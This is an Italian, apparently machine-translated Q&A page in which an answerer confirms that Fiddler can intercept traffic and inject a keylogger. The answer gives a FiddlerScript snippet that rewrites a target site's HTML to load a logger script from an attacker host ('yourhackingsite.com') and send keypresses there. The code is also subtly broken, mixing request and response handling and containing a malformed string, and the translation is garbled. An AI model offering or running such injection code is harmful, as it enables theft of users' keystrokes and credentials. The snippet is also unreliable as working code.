Possiamo intercettare il traffico web usando Fiddler e iniettare una funzionalità come il keylogger prima della richiesta al server?
Possiamo intercettare il traffico web usando Fiddler e iniettare una funzionalità come il keylogger prima della richiesta al server?
Sì, puoi farlo.
Prima di tutto è necessario aggiungere l'estensione del violinista chiamata script Fiddler . Questo ti permette di gestire eventi Fiddler come OnBeforeRequest, OnBeforeResponse etc ..
Poiché devi intercettare il traffico su richiesta, devi intercettare l'evento OnBeforeRequest.
Di seguito è riportato un codice di esempio che è possibile utilizzare per ottenere ciò utilizzando lo script del violinista. Tieni presente che non sarai in grado di ottenere esattamente ciò di cui hai bisogno da questo script, ma usalo come avvio e modificalo in base alle tue esigenze.
if (oSession.HostnameIs("www.yourtargetsite.com") && oSession.HTTPMethodIs("POST")) // or what ever your web method
{
oSession.utilDecodeResponse();
var body = System.Text.Encoding.UTF8GetString(oSession.responseBodyBytes); // grab the request body here
var logger = '<script src="http://yourhackingsite.com/logger.js"></script>';logger+='<script>destination=http://yourhackingsite.com/LogKeyPress?key=";</script>';
body = body.replace("<head>",logger + "</head>");
oSession.utilDecodeResponseBody(body); // inject your custom altered body
}
Leggi altre domande sui tag keyloggers ssl-interception